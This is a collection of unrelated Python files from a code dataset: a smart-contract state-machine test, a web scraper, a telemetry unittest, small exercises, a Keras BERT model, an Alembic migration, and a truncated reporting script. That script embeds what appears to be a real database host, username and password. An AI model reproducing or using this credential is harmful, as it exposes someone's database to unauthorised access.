token.delegator:\n assert timestamp >= token.cancel_time\n else:\n assert False\n\n if update_state:\n self.boost[token.delegator].delegated -= token\n self.boost[token.owner].received -= token\n self.boost_tokens[token_id] *= 0\n self.boost_tokens[token_id].cancel_time = 0\n\n def transfer_from(\n self,\n _from: Account,\n _to: Account,\n token_id: int,\n timestamp: int,\n update_state: bool = False,\n ):\n assert self.boost_tokens[token_id].owner == _from\n assert _to != ZERO_ADDRESS\n\n token: Token = self.boost_tokens[token_id]\n value: int = token(timestamp)\n\n if update_state:\n if value > 0:\n self.boost[_from].received -= token\n self.boost[_to].received += token\n self.boost_tokens[token_id].owner = _to\n else:\n self.boost[token.delegator].delegated -= token\n self.boost[_from].received -= token\n self.boost_tokens[token_id].slope = 0\n self.boost_tokens[token_id].bias = 0\n self.boost_tokens[token_id].owner = _to\n\n def adjusted_balance_of(self, account: Account, timestamp: int, vecrv_balance: int) -> int:\n if any(\n [\n token(timestamp) < 0\n for token in self.boost_tokens.values()\n if token.delegator == account\n ]\n ):\n return 0\n\n delegated = self.boost[account].delegated(timestamp)\n received = self.boost[account].received(timestamp)\n balance = vecrv_balance - abs(delegated) + max(received, 0)\n return max(balance, 0)\n\n @staticmethod\n def get_token_id(account: str, _id: int) -> int:\n return (convert.to_uint(account) << 96) + _id\n\n @staticmethod\n def round_to_nearest_week(time: int) -> int:\n return (time // WEEK) * WEEK\n\n\nclass StateMachine:\n\n account = strategy(\"address\")\n timedelta = strategy(\"uint32\", min_value=WEEK - DAY, max_value=2 * YEAR)\n pct = strategy(\"int16\", min_value=-1, max_value=10_001)\n\n def __init__(\n cls, accounts: Accounts, crv: Contract, vecrv: Contract, veboost: Contract\n ) -> None:\n cls.accounts = accounts\n cls.crv = crv\n cls.vecrv = vecrv\n cls.veboost = veboost\n\n # available throughout all the test runs\n brownie.multicall.deploy({\"from\": accounts[0]})\n\n def setup(self) -> None:\n self.state = ContractState()\n self.delegator_ids = defaultdict(set)\n\n total_supply = self.crv.balanceOf(self.accounts[0])\n amount = total_supply // len(self.accounts)\n for account in self.accounts:\n self.crv.transfer(account, amount, {\"from\": self.accounts[0]})\n self.crv.approve(self.vecrv, 2 ** 256 - 1, {\"from\": account})\n # lock up half of each accounts balance for 3 years\n self.vecrv.create_lock(amount, chain.time() + 3 * YEAR, {\"from\": account})\n\n def rule_create_boost(\n self,\n percentage: int = \"pct\",\n expire_time: int = \"timedelta\",\n delegator: Account = \"account\",\n receiver: Account = \"account\",\n ):\n with brownie.multicall(block_identifier=chain.height):\n vecrv_balance = self.vecrv.balanceOf(delegator)\n lock_expiry = self.vecrv.locked__end(delegator)\n\n _id = (set(range(10000)) - self.delegator_ids[delegator]).pop()\n self.delegator_ids[delegator].add(_id)\n time = self.state.round_to_nearest_week(int(expire_time + chain.time()))\n try:\n self.state.create_boost(\n delegator,\n receiver,\n percentage,\n time,\n time,\n _id,\n int(chain.time()),\n vecrv_balance,\n lock_expiry,\n )\n except AssertionError:\n with brownie.reverts():\n self.veboost.create_boost(\n delegator,\n receiver,\n percentage,\n time,\n time,\n _id,\n {\"from\": delegator},\n )\n else:\n tx = self.veboost.create_boost(\n delegator,\n receiver,\n percentage,\n time,\n time,\n _id,\n {\"from\": delegator},\n )\n with 
brownie.multicall(block_identifier=tx.block_number):\n vecrv_balance = self.vecrv.balanceOf(delegator)\n lock_expiry = self.vecrv.locked__end(delegator)\n self.state.create_boost(\n delegator,\n receiver,\n percentage,\n time,\n time,\n _id,\n tx.timestamp,\n vecrv_balance,\n lock_expiry,\n True,\n )\n\n def rule_extend_boost(\n self,\n pct: int,\n expire_time=\"timedelta\",\n ):\n if not self.delegator_ids:\n return\n delegator = list(self.delegator_ids.keys()).pop()\n if not self.delegator_ids[delegator]:\n return\n _id = self.delegator_ids[delegator].pop()\n token_id = self.state.get_token_id(delegator.address, _id)\n\n time = self.state.round_to_nearest_week(int(expire_time + chain.time()))\n with brownie.multicall(block_identifier=chain.height):\n vecrv_balance = self.vecrv.balanceOf(delegator)\n lock_expiry = self.vecrv.locked__end(delegator)\n\n try:\n self.state.extend_boost(\n token_id,\n pct,\n time,\n time,\n int(chain.time()),\n vecrv_balance,\n lock_expiry,\n )\n except AssertionError:\n with brownie.reverts():\n self.veboost.extend_boost(\n token_id,\n pct,\n time,\n time,\n {\"from\": self.state.boost_tokens[token_id].delegator or self.accounts[0]},\n )\n else:\n tx = self.veboost.extend_boost(\n token_id,\n pct,\n time,\n time,\n {\"from\": self.state.boost_tokens[token_id].delegator},\n )\n with brownie.multicall(block_identifier=tx.block_number):\n vecrv_balance = self.vecrv.balanceOf(delegator)\n lock_expiry = self.vecrv.locked__end(delegator)\n\n self.state.extend_boost(\n token_id,\n pct,\n time,\n time,\n tx.timestamp,\n vecrv_balance,\n lock_expiry,\n True,\n )\n\n def rule_transfer_boost(self, _to: Account = \"account\"):\n available_tokens = list(self.state.boost_tokens.keys())\n if not available_tokens:\n return\n token_id = available_tokens.pop()\n _from = self.state.boost_tokens[token_id].owner or self.accounts[0]\n\n try:\n self.state.transfer_from(_from, _to, token_id, chain.time())\n except AssertionError:\n with brownie.reverts():\n self.veboost.transferFrom(_from, _to, token_id, {\"from\": _from})\n else:\n tx = self.veboost.transferFrom(_from, _to, token_id, {\"from\": _from})\n self.state.transfer_from(_from, _to, token_id, tx.timestamp, True)\n\n def rule_cancel_boost(self, caller: Account = \"account\"):\n available_tokens = list(self.state.boost_tokens.keys())\n if not available_tokens:\n return\n token_id = available_tokens.pop()\n\n if self.state.boost_tokens[token_id].owner is None:\n assert self.veboost.ownerOf(token_id) == ZERO_ADDRESS\n return\n\n try:\n self.state.cancel_boost(token_id, caller, chain.time())\n except AssertionError:\n with brownie.reverts():\n self.veboost.cancel_boost(token_id, {\"from\": caller})\n else:\n tx = self.veboost.cancel_boost(token_id, {\"from\": caller})\n self.state.cancel_boost(token_id, caller, tx.timestamp, True)\n\n def rule_advance_time(self, timedelta):\n chain.mine(timedelta=timedelta)\n\n def invariant_adjusted_balance(self):\n for account in self.accounts:\n with brownie.multicall(block_identifier=chain.height):\n vecrv_balance = self.vecrv.balanceOf(account)\n timestamp = brownie.multicall._contract.getCurrentBlockTimestamp()\n adj_balance = self.veboost.adjusted_balance_of(account)\n\n assert math.isclose(\n adj_balance,\n self.state.adjusted_balance_of(account, timestamp, vecrv_balance),\n rel_tol=0.0001,\n abs_tol=100_000,\n )\n\n\ndef test_boost_state(state_machine, accounts, crv, vecrv, veboost):\n state_machine(\n StateMachine,\n accounts,\n crv,\n vecrv,\n veboost,\n 
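# The settings dict is forwarded to hypothesis; capping stateful_step_count\n        # keeps each generated run to at most 25 rule invocations.\n        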
settings={\"stateful_step_count\": 25},\n )\n","sub_path":"tests/boosts/test_state.py","file_name":"test_state.py","file_ext":"py","file_size_in_byte":17312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"258175926","text":"from .config import settings\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass DouBan:\n\n def __init__(self, keywords):\n self.keywords = keywords\n\n def fetch(self):\n url = settings.DOUBAN_SEARCH + self.keywords\n try:\n response = requests.get(url, headers=settings.CRAWLER_HEADERS)\n if response.status_code == 200:\n response.encoding = 'utf-8'\n detail_url = self.parse_link(response.text)\n spoiler_text = self.fetch_detail(detail_url)\n return spoiler_text\n else:\n return None\n except Exception as e:\n print(e)\n\n def parse_link(self, content):\n soup = BeautifulSoup(content, settings.PARSER)\n a_tag = soup.find_all('h3')[0].a\n return a_tag['href']\n\n def fetch_detail(self, url):\n try:\n response = requests.get(url, headers=settings.CRAWLER_HEADERS)\n if response.status_code == 200:\n soup = BeautifulSoup(response.text, settings.PARSER)\n init_short_comment_seq = soup.find_all('span', attrs={'class': 'short'})\n short_comment_seq = [s.string for s in init_short_comment_seq]\n return ''.join(short_comment_seq)\n else:\n return None\n except Exception as e:\n print(e)","sub_path":"crawler/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"625042470","text":"# Copyright (c) 2012 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport os\nimport tempfile\nimport unittest\n\nfrom telemetry.core import util\nfrom telemetry.page import page_set\n\n\nsimple_archive_info = \"\"\"\n{\n\"archives\": {\n \"data_01.wpr\": [\"http://www.foo.com/\"],\n \"data_02.wpr\": [\"http://www.bar.com/\"]\n}\n}\n\"\"\"\n\n\nsimple_set = \"\"\"\n{\"description\": \"hello\",\n \"archive_data_file\": \"%s\",\n \"pages\": [\n {\"url\": \"http://www.foo.com/\"},\n {\"url\": \"http://www.bar.com/\"}\n ]\n}\n\"\"\"\n\n\nclass TestPageSet(unittest.TestCase):\n def testSimpleSet(self):\n try:\n with tempfile.NamedTemporaryFile(delete=False, suffix=\".json\") as f:\n f.write(simple_archive_info)\n\n with tempfile.NamedTemporaryFile(delete=False, suffix=\".json\") as f2:\n f2.write(simple_set % f.name.replace('\\\\', '\\\\\\\\'))\n\n ps = page_set.PageSet.FromFile(f2.name)\n finally:\n os.remove(f.name)\n os.remove(f2.name)\n\n self.assertEquals('hello', ps.description)\n self.assertEquals(f.name, ps.archive_data_file)\n self.assertEquals(2, len(ps.pages))\n self.assertEquals('http://www.foo.com/', ps.pages[0].url)\n self.assertEquals('http://www.bar.com/', ps.pages[1].url)\n self.assertEquals('data_01.wpr', os.path.basename(ps.pages[0].archive_path))\n self.assertEquals('data_02.wpr', os.path.basename(ps.pages[1].archive_path))\n\n def testServingDirs(self):\n directory_path = tempfile.mkdtemp()\n try:\n ps = page_set.PageSet.FromDict({\n 'serving_dirs': ['a/b'],\n 'pages': [\n {'url': 'file://c/test.html'},\n {'url': 'file://c/test.js'},\n {'url': 'file://d/e/../test.html'},\n ]\n }, directory_path)\n finally:\n os.rmdir(directory_path)\n\n real_directory_path = os.path.realpath(directory_path)\n expected_serving_dirs = set([os.path.join(real_directory_path, 'a', 'b')])\n self.assertEquals(ps.serving_dirs, expected_serving_dirs)\n self.assertEquals(ps[0].serving_dir, os.path.join(real_directory_path, 'c'))\n self.assertEquals(ps[2].serving_dir, os.path.join(real_directory_path, 'd'))\n\n def testRenamingCompoundActions(self):\n ps = page_set.PageSet.FromDict({\n 'serving_dirs': ['a/b'],\n 'smoothness' : { 'action' : 'scroll' },\n 'pages': [\n {'url': 'http://www.foo.com',\n 'stress_memory': {'action': 'javasciprt'}\n },\n {'url': 'http://www.bar.com',\n 'navigate_steps': {'action': 'navigate2'},\n 'repaint' : {'action': 'scroll'}\n },\n ]}, 'file://foo.js')\n\n self.assertTrue(hasattr(ps.pages[0], 'RunNavigateSteps'))\n self.assertEquals(ps.pages[0].RunSmoothness, {'action': 'scroll'})\n self.assertEquals(ps.pages[0].RunStressMemory, {'action': 'javasciprt'})\n\n self.assertEquals(ps.pages[1].RunSmoothness, {'action': 'scroll'})\n self.assertEquals(ps.pages[1].RunNavigateSteps, {'action': 'navigate2'})\n self.assertEquals(ps.pages[1].RunRepaint, {'action': 'scroll'})\n\n def testRunNavigateStepsInheritance(self):\n ps = page_set.PageSet.FromDict({\n 'serving_dirs': ['a/b'],\n 'navigate_steps' : { 'action' : 'navigate1' },\n 'pages': [\n {'url': 'http://www.foo.com',\n },\n {'url': 'http://www.bar.com',\n 'navigate_steps': {'action': 'navigate2'},\n },\n ]}, 'file://foo.js')\n\n self.assertEquals(ps.pages[0].RunNavigateSteps, {'action': 'navigate1'})\n self.assertEquals(ps.pages[1].RunNavigateSteps, {'action': 'navigate2'})\n\n\n def testSuccesfulPythonPageSetLoading(self):\n test_pps_dir = os.path.join(util.GetUnittestDataDir(), 
'test_page_set.py')\n pps = page_set.PageSet.FromFile(test_pps_dir)\n self.assertEqual('TestPageSet', pps.__class__.__name__)\n self.assertEqual('A pageset for testing purpose', pps.description)\n self.assertEqual('data/test.json', pps.archive_data_file)\n self.assertEqual('data/credential', pps.credentials_path)\n self.assertEqual('desktop', pps.user_agent_type)\n self.assertEqual(test_pps_dir, pps.file_path)\n self.assertEqual(1, len(pps.pages))\n google_page = pps.pages[0]\n self.assertEqual('https://www.google.com', google_page.url)\n self.assertIs(pps, google_page.page_set)\n self.assertTrue(hasattr(google_page, 'RunNavigateSteps'))\n self.assertTrue(5, google_page.RunGetActionRunner(action_runner=5))\n\n def testMultiplePythonPageSetsLoading(self):\n test_pps_1_dir = os.path.join(util.GetUnittestDataDir(),\n 'test_simple_one_page_set.py')\n test_pps_2_dir = os.path.join(util.GetUnittestDataDir(),\n 'test_simple_two_page_set.py')\n pps1 = page_set.PageSet.FromFile(test_pps_1_dir)\n pps2 = page_set.PageSet.FromFile(test_pps_2_dir)\n\n self.assertEqual('TestSimpleOnePageSet', pps1.__class__.__name__)\n self.assertEqual('TestSimpleTwoPageSet', pps2.__class__.__name__)\n","sub_path":"tools/telemetry/telemetry/page/page_set_unittest.py","file_name":"page_set_unittest.py","file_ext":"py","file_size_in_byte":4957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"56335896","text":"# Shopping list program\n# create an empty shopping list\nostoslista = []\n\nwhile True:\n    # ask the user what they want to do\n    print(\"Haluatko\")\n    print(\"(1)Lisätä listaan\")\n    print(\"(2)Poistaa listalta vai\")\n    valinta = input(\"(3)Lopettaa?:\")\n\n    try:\n        if valinta == \"1\": # add items to the shopping list\n            tavara = input(\"Mitä lisätään?:\")\n            ostoslista.append(tavara)\n        elif valinta == \"2\": # remove the chosen item from the shopping list\n            print(\"Listalla on\", len(ostoslista), \"alkiota.\")\n            poistettava = int(input(\"Monesko niistä poistetaan?:\"))\n            ostoslista.pop(poistettava - 1) # the prompt asks for a 1-based position\n        elif valinta == \"3\": # print the list and end the program\n            print(\"Listalla oli tuotteet:\")\n            for alkio in ostoslista:\n                print(alkio)\n            break\n        else:\n            # the user's choice doesn't match any option, so raise an exception\n            raise Exception\n    except Exception:\n        # handle invalid input from the user\n        print(\"Virheellinen valinta.\")\n\n","sub_path":"Python-kurssi/teht_12.2.py","file_name":"teht_12.2.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"236805220","text":"#!/usr/bin/python3\n\"\"\"start doc\"\"\"\n\n\nclass Student():\n \"\"\" student info gather\"\"\"\n def __init__(self, first_name, last_name, age):\n \"\"\" init \"\"\"\n self.first_name = first_name\n self.last_name = last_name\n self.age = age\n\n def to_json(self, attrs=None):\n \"\"\" class to json\n @attrs: attribute list\"\"\"\n if attrs is None:\n return self.__dict__\n temp = self.__dict__.keys()\n new = {}\n for i in attrs:\n if type(i) != str:\n return self.__dict__\n if i in temp:\n new.update({i: self.__dict__[i]})\n return new\n","sub_path":"0x0B-python-input_output/10-student.py","file_name":"10-student.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"257355300","text":"import classes\nfrom firebase import firebase\n\ntext = \"the dosa was very good and above average\"\n\nsplitter = classes.Splitter()\npostagger = classes.POSTagger()\n\nsplitted_sentences = splitter.split(text)\n\n#print(splitted_sentences)\n\npos_tagged_sentences = postagger.pos_tag(splitted_sentences)\n\n#print (pos_tagged_sentences)\n \n \ndicttagger = classes.DictionaryTagger([ 'pos.yml', 'neg.yml','food.yml'])\n\ndict_tagged_sentences = dicttagger.tag(pos_tagged_sentences)\n\nprint(dict_tagged_sentences)\nhotel = \"shantisagar\"\nt = []\n\ndef value_of(sentiment):\n if sentiment == 'positive': return 1\n if sentiment == 'negative': return -1\n if \"food\" in sentiment:\n t.append(sentiment[5:])\n return 0\n\ndef sentiment_score (review): \n return sum ([value_of(tag) for sentence in dict_tagged_sentences for token in sentence for tag in token[2]])\nscore = sentiment_score(dict_tagged_sentences)\nprint(score)\nprint(t)\n\nfirebase=firebase.FirebaseApplication('https://travelinstyle-534e6.firebaseio.com')\nresult = firebase.post('/reviews/' + hotel + \"/\",{'food' : t[0],'score': score})\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"330859987","text":"from utils import CosineLayer \nfrom keras_bert import load_trained_model_from_checkpoint\nimport tensorflow as tf\nfrom keras.layers import *\nfrom keras.models import Model\nfrom keras.optimizers import Adam\n\nfrom data3 import train_data_generator\nfrom keras.callbacks import EarlyStopping\n\nclass BertConfig():\n    # Configuration for BertModel\n    def __init__(self,\n                 learning_rate=5e-4,\n                 min_learning_rate=1e-5,\n                 maxlen = 510,\n                 config_path=r\"./bert_config.json\",\n                 checkpoint_path='./bert_model.ckpt',\n                 dict_path='./vocab.txt',\n                 trainable=False):\n        '''\n        learning_rate: learning rate\n        min_learning_rate: minimum learning rate\n        maxlen = 510: maximum input text length; longer inputs are truncated\n        config_path: BERT model config file\n        checkpoint_path: BERT model checkpoint file\n        dict_path: BERT model vocabulary file\n        trainable: whether to fine-tune the BERT weights\n\n        '''\n        self.learning_rate=learning_rate\n        self.min_learning_rate=min_learning_rate\n        self.maxlen=maxlen\n        self.trainable=trainable\n        self.config_path=config_path\n        self.dict_path=dict_path\n        self.checkpoint_path=checkpoint_path\n        self.dropout=0.15\n\n\nclass BertModel():\n    def __init__(self,config):\n        self.config=config\n        self.bert_model = load_trained_model_from_checkpoint(config.config_path, config.checkpoint_path, seq_len=None)\n\n    def build_model(self):\n        self.inputs=[]\n        self.outputs=[]\n\n        input_x_word=Input(shape=(None,))\n        input_mask=Input(shape=(None,))\n        output_mask=Input(shape=(None,),dtype=\"bool\") #text\n\n        self.inputs.append(input_x_word)\n        self.inputs.append(input_mask)\n        self.inputs.append(output_mask)\n\n        x = self.bert_model([input_x_word, input_mask])\n        bert_out = Lambda(lambda x:tf.boolean_mask(x[0],x[1]))([x,output_mask])\n\n        input_x_word=Input(shape=(None,))\n        input_mask=Input(shape=(None,))\n        output_mask=Input(shape=(None,),dtype=\"bool\") #short1\n\n        self.inputs.append(input_x_word)\n        self.inputs.append(input_mask)\n        self.inputs.append(output_mask)\n\n        x = self.bert_model([input_x_word, input_mask])\n        bert_out1 = Lambda(lambda x:tf.boolean_mask(x[0],x[1]))([x,output_mask])\n\n        input_x_word=Input(shape=(None,))\n        input_mask=Input(shape=(None,))\n        output_mask=Input(shape=(None,),dtype=\"bool\") #short2\n\n        self.inputs.append(input_x_word)\n        self.inputs.append(input_mask)\n        self.inputs.append(output_mask)\n\n        x = self.bert_model([input_x_word, input_mask])\n        bert_out2 = Lambda(lambda x:tf.boolean_mask(x[0],x[1]))([x,output_mask])\n\n        input_x_word=Input(shape=(None,))\n        input_mask=Input(shape=(None,))\n        output_mask=Input(shape=(None,),dtype=\"bool\") #descript\n\n        self.inputs.append(input_x_word)\n        self.inputs.append(input_mask)\n        self.inputs.append(output_mask)\n\n        x = self.bert_model([input_x_word, input_mask])\n        bert_out3 = Lambda(lambda x:tf.boolean_mask(x[0],x[1]))([x,output_mask])\n\n        cosine = CosineLayer()\n        similarity = Lambda(lambda x:cosine(x[0],x[1]))([bert_out1,bert_out2])\n\n        concat=Lambda(lambda x:K.concatenate([x[0],x[1]] , axis=0))([bert_out,bert_out3])\n        concat = Lambda(lambda x:tf.reshape(x,[-1,768*4]))(concat)\n        concat=Lambda(lambda x:K.concatenate([x[0],x[1]] , axis=1))([concat,similarity])\n\n        dense = Dense(256, activation='relu')(concat)\n        dropout = Dropout(self.config.dropout)(dense)\n        out = Dense(1,activation='sigmoid')(dropout)\n\n        self.outputs.append(out)\n\n        self.model = Model(inputs = self.inputs,outputs = self.outputs)\n        self.model.compile(optimizer=Adam(self.config.learning_rate),\n                           loss='binary_crossentropy')\n\n\n    def eval(self,data):\n        test=data.test_batch()\n        acc_max=0\n        f1_max=0\n        res=[]\n        ans=[]\n        _eval=[]\n        for i in range(data.test_step):\n            x,y=next(test)\n            r=self.model.predict(x) # predict with this instance's model\n            for j in range(len(r)):\n                res.append(r[j][0])\n                ans.append(y[j])\n        
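# Sweep candidate thresholds over the collected sigmoid scores; for each one,\n        # build a confusion matrix and derive precision = tp/(tp+fp),\n        # recall = tp/(tp+fn), f1 = 2*pre*recall/(pre+recall).\n        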
r=self.model.predict(x)\n for j in range(len(r)):\n res.append(r[j][0])\n ans.append(y[j])\n for j in range(99):\n threshold=j*0.01\n tp=0\n fp=0\n tn=0\n fn=0\n for k in range(len(res)):\n if res[k]>threshold:\n if ans[k]==1:\n tp+=1\n if ans[k]==0:\n fp+=1\n if res[k]<=threshold: # reconstructed: this branch and the metric lines below were lost to extraction garbling\n if ans[k]==1:\n fn+=1\n if ans[k]==0:\n tn+=1\n acc=(tp+tn)/float(tp+fp+tn+fn)\n if(acc>acc_max):\n acc_max=acc\n if(tp==0 or fp==0 or fn==0 or tn==0):\n continue\n recall=tp/float(tp+fn)\n pre=tp/float(tp+fp)\n f1=2*pre*recall/(pre+recall)\n print(\"threshold:{0} acc:{1} recall:{2} pre:{3} f1:{4}\".format(threshold,acc,recall,pre,f1))\n return acc_max\n \nif __name__=='__main__':\n config=BertConfig()\n model=BertModel(config)\n model.build_model()\n \n data=train_data_generator()\n train=data.train_batch()\n test=data.test_batch()\n\n acc_max=0\n \n for i in range(50):\n model.model.load_weights(\"bert_model3_epoch0\")\n model.model.fit_generator(\n train,\n steps_per_epoch=data.train_step,\n epochs=1,\n validation_data=test,\n validation_steps=data.test_step,\n )\n acc=model.eval(data)\n if(acc>acc_max):\n acc_max=acc\n model.model.save_weights(\"bert_model3_epoch\"+str(i))\n\n","sub_path":"model/Bert/bert_model3.py","file_name":"bert_model3.py","file_ext":"py","file_size_in_byte":6038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
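The `eval` method above sweeps a 0.00-0.98 decision threshold and keeps the best accuracy; the confusion-matrix block was reconstructed from the variables its print statement references. The same sweep in isolation, on made-up scores:

```python
# Stand-alone threshold sweep over predicted probabilities; `scores` and
# `labels` are invented stand-ins for the model outputs collected above.
scores = [0.9, 0.8, 0.3, 0.6, 0.1]
labels = [1, 1, 0, 1, 0]

best_acc = 0.0
for j in range(99):
    th = j * 0.01
    tp = sum(1 for s, y in zip(scores, labels) if s > th and y == 1)
    fp = sum(1 for s, y in zip(scores, labels) if s > th and y == 0)
    fn = sum(1 for s, y in zip(scores, labels) if s <= th and y == 1)
    tn = sum(1 for s, y in zip(scores, labels) if s <= th and y == 0)
    acc = (tp + tn) / len(scores)
    best_acc = max(best_acc, acc)
    if tp and fp and fn and tn:  # skip degenerate thresholds, as above
        pre = tp / (tp + fp)
        rec = tp / (tp + fn)
        f1 = 2 * pre * rec / (pre + rec)
print(best_acc)
```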
+{"seq_id":"491984339","text":"\"\"\"report add date\n\nRevision ID: 19215a5c5cab\nRevises: 36b15b5a5f9b\nCreate Date: 2018-08-07 17:42:35.690961\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '19215a5c5cab'\ndown_revision = '36b15b5a5f9b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'chandao_session_id')\n op.drop_column('user', 'chandao_za')\n op.add_column('weekly_report', sa.Column('end_date', sa.DateTime(), nullable=True))\n op.add_column('weekly_report', sa.Column('start_date', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('weekly_report', 'start_date')\n op.drop_column('weekly_report', 'end_date')\n op.add_column('user', sa.Column('chandao_za', sa.VARCHAR(length=40), nullable=True))\n op.add_column('user', sa.Column('chandao_session_id', sa.VARCHAR(length=40), nullable=True))\n # ### end Alembic commands ###\n","sub_path":"alembic/versions/19215a5c5cab_report_add_date.py","file_name":"19215a5c5cab_report_add_date.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"206734906","text":"#coding: utf-8\r\nimport sys\r\nimport requests\r\nimport arrow\r\nimport json\r\nimport pandas as pd\r\nfrom pandas import Series,DataFrame\r\nimport zhuge_email\r\nimport pymysql\r\nimport xlsxwriter\r\nimport smtplib\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.application import MIMEApplication\r\nfrom email.mime.text import MIMEText\r\nfrom email.header import Header\r\nfrom email.utils import parseaddr, formataddr\r\nfrom email import encoders\r\nimport tools\r\n\r\nnow=arrow.now().to('local').format('YYYY-MM-DD HH:mm:ss')\r\ntoday=arrow.now().to('local').format('YYYY-MM-DD')\r\nyestoday=arrow.now().to('local').shift(days=-1).format('YYYY-MM-DD')\r\nyestoday_1=arrow.now().to('local').shift(days=-2).format('YYYY-MM-DD')\r\nbefore_7_days=arrow.now().to('local').shift(days=-7).format('YYYY-MM-DD')\r\nstart_date=before_7_days\r\n#print start_date\r\nbase_path='/data/zhuge/zhuge-sc/test/'\r\n#base_path='C:/Users/zhugefang/Desktop/broker_data/'\r\n\r\nconn1 = pymysql.connect(host='rds7fvc87wvo741u03j7.mysql.rds.aliyuncs.com', user='bi_r', passwd='42f4b17MG9a$f410e*74e0dcC587e!41', port=3306, db='zhuge_bi', charset='utf8')\r\n\r\n#两天分一个的城市\r\nall_a_cus_city = ['bj']\r\n\r\ndef cyc_allot(days):\r\n if days % 2 == 0:\r\n cyc='第一天-周期开始'\r\n return 1\r\n else :\r\n cyc = '第二天-本周期内分配情况'\r\n return 2\r\n\r\n#计算天数\r\ndef days_need():\r\n day_space = (arrow.get(yestoday) - arrow.get(start_date)).days\r\n day_list = []\r\n for i in range(day_space):\r\n i=i+1\r\n day = arrow.get(start_date).to('local').shift(days=i).format('YYYY-MM-DD')\r\n day_space_a=(arrow.get(day)-arrow.get('2018-05-25')).days\r\n if cyc_allot(day_space_a) == 1:\r\n day_2=arrow.get(day).to('local').shift(days=1).format('YYYY-MM-DD')\r\n day_list.append([day,day_2])\r\n else:\r\n pass\r\n print (day_list)\r\n return day_list\r\n\r\n#二手房数据\r\ndef old_house(cyc_str,date,date_1,city):\r\n sql='''\r\n select '%s' as 'cyc_str',A.logogram,A.city_cn,A.broker_phone,A.realname,A.company_name,A.company_node1,\r\n (case when A.cus_use>0 THEN 1 ELSE 0 END) as 'is_used',cus_use,A.allot_count,A.self_count,B.call,C.called,D.call_50,F.callin,F.called_in,\r\n cityarea_count,borough_count,house_num,self_house_num,important,super,A.company_node2,A.company_node3,bd_name\r\n from \r\n (SELECT b.logogram,city_cn,a.broker_phone,realname,company_name,\r\n company_node1,company_node2,company_node3,c.bd_name,\r\n sum(case when LENGTH(max_usetime_am)>2 then 1 else 0 end) as 'cus_use',max(allot_count) as 'allot_count',\r\n max(self_count) as 'self_count',max(borough_count) as 'borough_count',\r\n max(cityarea_count) 'cityarea_count',max(effect_cloud_store_house_num) 'house_num',\r\n max(release_house_num) 'self_house_num',sum(important_promotion_house_num) 'important',\r\n sum(super_promotion_house_num) 'super'\r\n FROM pay_users_count a inner join zhuge_city b on a.city_id=b.id\r\n left join zhuge_bd c on a.broker_phone=c.broker_phone\r\n where 1=1\r\n and date>='%s' and date<='%s' and company_id!=119 and b.logogram='%s'\r\n group by b.logogram,city_cn,a.broker_phone,realname,company_name,company_node1,company_node2,company_node3,bd_name\r\n ) A\r\n LEFT JOIN\r\n -- 拨打客源数\r\n (SELECT broker_phone,count(distinct user_id) as 'call' FROM zhuge_callout where 1=1\r\n and date>='%s' and date<='%s' and is_allot=1 and type='oldhouse'\r\n and city_en='%s'\r\n group by broker_phone) B ON A.broker_phone=B.broker_phone\r\n LEFT JOIN\r\n -- 打通的客源数\r\n (SELECT broker_phone,count(distinct user_id) as 'called' FROM 
zhuge_callout where 1=1\r\n and date>='%s' and date<='%s' and is_allot=1 and type='oldhouse' \r\n and calltime_seconds>0 and city_en='%s'\r\n group by broker_phone) C ON A.broker_phone=C.broker_phone\r\n LEFT JOIN\r\n -- leads with calls of 50+ seconds\r\n (SELECT broker_phone,count(distinct user_id) as 'call_50' FROM zhuge_callout where 1=1\r\n and date>='%s' and date<='%s' and is_allot=1 and type='oldhouse' \r\n and calltime_seconds>=50 and city_en='%s'\r\n group by broker_phone) D ON A.broker_phone=D.broker_phone\r\n LEFT JOIN\r\n -- number of inbound calls\r\n (SELECT broker_phone,count(*) as 'callin',sum(case when calltime_seconds>0 then 1 else 0 end) as 'called_in'\r\n FROM zhuge_callin a where 1=1 and date>='%s' and date<='%s' and type='oldhouse' \r\n and city_en='%s' \r\n group by broker_phone) F ON A.broker_phone=F.broker_phone\r\n '''% (cyc_str,date,date_1,city,date,date_1,city,date,date_1,city,date,date_1,city,date,date_1,city)\r\n df = pd.read_sql(sql, conn1)\r\n return df\r\n\r\ndef city_write():\r\n day_lists=days_need()\r\n cyc_space=len(day_lists)\r\n for city in all_a_cus_city:\r\n file_name = 'broker_use_count_%s_%s.xlsx' % (city, yestoday_1)\r\n file_path = base_path + file_name\r\n write = pd.ExcelWriter(file_path)\r\n base_data=pd.DataFrame()\r\n for date in day_lists:\r\n cyc_str=date[0]+'周期'\r\n base_data_1 = old_house(cyc_str,date[0], date[1],city)\r\n base_data = base_data.append(base_data_1)\r\n base_data=base_data.fillna(0)\r\n base_data[['is_used', 'cus_use', 'allot_count', 'self_count','call','called','call_50', 'callin', 'called_in','cityarea_count','borough_count',\\\r\n 'house_num','self_house_num']] = base_data[['is_used', 'cus_use', 'allot_count', 